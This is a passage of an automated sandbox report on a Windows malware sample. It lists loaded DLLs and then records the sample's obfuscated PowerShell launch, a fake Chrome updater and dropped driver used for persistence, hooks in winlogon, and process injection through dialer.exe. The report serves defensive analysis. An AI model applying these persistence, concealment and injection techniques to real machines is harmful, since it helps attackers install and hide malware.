                      Source: C:\Windows\SysWOW64\system64x.exe | Section loaded: apphelp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
                      Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
                      Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
                      Source: C:\ProgramData\Google\Chrome\updater.exe | Section loaded: apphelp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
                      Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
                      Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: napinsp.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: wshbth.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: nlaapi.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: winrnr.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: rasadhlp.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: loadperf.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ~1.PDB @ source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, MainModuleUI.cs .Net Code: Prompt
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Anti Malware Scan Interface: FromBase64String("$pwshcode"))Invoke-Expression $pwshdecoded$Decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAIWQMW/CMBCF/8opQqKVmlhNDAMIVRXQrYCUIQtLEp8TR45N7YsM/76GoWqnTnfSe+/03XsXIv28nBxKd
                      Source: C:\Windows\System32\dialer.exe Code function: 47_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 47_2_00000001408460F0
                      Source: system64x.exe.1.dr Static PE information: section name: .00cfg
                      Source: updater.exe.3.dr Static PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Code function: 1_2_00007FF8489BD2A5 pushad ; iretd 1_2_00007FF8489BD2A6
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Code function: 1_2_00007FF848AD7113 push eax; iretd 1_2_00007FF848AD7141
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Code function: 1_2_00007FF848AD7143 push eax; iretd 1_2_00007FF848AD7141
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Code function: 1_2_00007FF848AD00BD pushad ; iretd 1_2_00007FF848AD00C1
                      Source: C:\Windows\SysWOW64\system64x.exe Code function: 3_2_00007FF762441394 push qword ptr [00007FF76244B004h]; ret 3_2_00007FF762441403
                      Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000001E85896ACDD push rcx; retf 003Fh 22_2_000001E85896ACDE
                      Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000001E85899C6DD push rcx; retf 003Fh 22_2_000001E85899C6DE
                      Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000001E8589CACDD push rcx; retf 003Fh 22_2_000001E8589CACDE
                      Source: C:\ProgramData\Google\Chrome\updater.exe Code function: 28_2_00007FF72AF21394 push qword ptr [00007FF72AF2B004h]; ret 28_2_00007FF72AF21403
                      Source: C:\Windows\System32\lsass.exe Code function: 31_2_00000140ADFDACDD push rcx; retf 003Fh 31_2_00000140ADFDACDE
                      Source: C:\Windows\System32\lsass.exe Code function: 31_2_00000140AE87C6DD push rcx; retf 003Fh 31_2_00000140AE87C6DE
                      Source: C:\Windows\System32\svchost.exe Code function: 32_2_00000195DD5AACDD push rcx; retf 003Fh 32_2_00000195DD5AACDE
                      Source: C:\Windows\System32\svchost.exe Code function: 32_2_00000195DD5DC6DD push rcx; retf 003Fh 32_2_00000195DD5DC6DE
                      Source: C:\Windows\System32\dwm.exe Code function: 33_2_000001160CA7ACDD push rcx; retf 003Fh 33_2_000001160CA7ACDE
                      Source: C:\Windows\System32\dwm.exe Code function: 33_2_000001160CAAC6DD push rcx; retf 003Fh 33_2_000001160CAAC6DE
                      Source: C:\Windows\System32\dialer.exe Code function: 45_2_0000000140001394 push qword ptr [0000000140009004h]; ret 45_2_0000000140001403
                      Source: C:\Windows\System32\svchost.exe Code function: 48_2_00000257E108ACDD push rcx; retf 003Fh 48_2_00000257E108ACDE
                      Source: C:\Windows\System32\svchost.exe Code function: 48_2_00000257E10BC6DD push rcx; retf 003Fh 48_2_00000257E10BC6DE
                      Source: C:\Windows\System32\svchost.exe Code function: 49_2_000001F28C1EACDD push rcx; retf 003Fh 49_2_000001F28C1EACDE
                      Source: C:\Windows\System32\svchost.exe Code function: 49_2_000001F28C94C6DD push rcx; retf 003Fh 49_2_000001F28C94C6DE
                      Source: C:\Windows\System32\svchost.exe Code function: 50_2_000001CA97FEACDD push rcx; retf 003Fh 50_2_000001CA97FEACDE
                      Source: C:\Windows\System32\svchost.exe Code function: 50_2_000001CA9855C6DD push rcx; retf 003Fh 50_2_000001CA9855C6DE
                      Source: C:\Windows\System32\svchost.exe Code function: 51_2_000001D2652FACDD push rcx; retf 003Fh 51_2_000001D2652FACDE
                      Source: C:\Windows\System32\svchost.exe Code function: 51_2_000001D26532C6DD push rcx; retf 003Fh 51_2_000001D26532C6DE
                      Source: C:\Windows\System32\svchost.exe Code function: 52_2_00000254A27EC6DD push rcx; retf 003Fh 52_2_00000254A27EC6DE
                      Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 53_2_0000028708E4ACDD push rcx; retf 003Fh 53_2_0000028708E4ACDE
                      Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 53_2_0000028708E7C6DD push rcx; retf 003Fh 53_2_0000028708E7C6DE
                      Source: C:\Windows\System32\svchost.exe Code function: 54_2_0000024B87DEC6DD push rcx; retf 003Fh 54_2_0000024B87DEC6DE
                      Source: C:\Windows\System32\svchost.exe Code function: 55_2_00000205FB3DACDD push rcx; retf 003Fh 55_2_00000205FB3DACDE
                      Source: C:\Windows\System32\svchost.exe Code function: 55_2_00000205FD41C6DD push rcx; retf 003Fh 55_2_00000205FD41C6DE
                      Source: C:\Windows\System32\svchost.exe Code function: 56_2_000001A2056BC6DD push rcx; retf 003Fh 56_2_000001A2056BC6DE

                      Persistence and Installation Behavior

                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Executable created and started: C:\Windows\SysWOW64\system64x.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exe File created: C:\Windows\TEMP\voeeoiqrjnla.sys
                      Source: C:\Windows\SysWOW64\system64x.exe File created: C:\ProgramData\Google\Chrome\updater.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe File created: C:\Windows\SysWOW64\system64x.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exe File created: C:\Windows\Temp\voeeoiqrjnla.sys
                      Source: C:\Windows\SysWOW64\system64x.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

                      Hooking and other Techniques for Hiding and Protection

                      Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                      Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                      Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: winlogon.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dialer.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,17_2_00000001400010C0
                      Source: C:\Windows\System32\dialer.exe | Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle | 44_2_00000001400010C0
                      Source: C:\Windows\System32\dialer.exe | System information queried: FirmwareTableInformation
                      Source: dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
                      Source: dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXEC
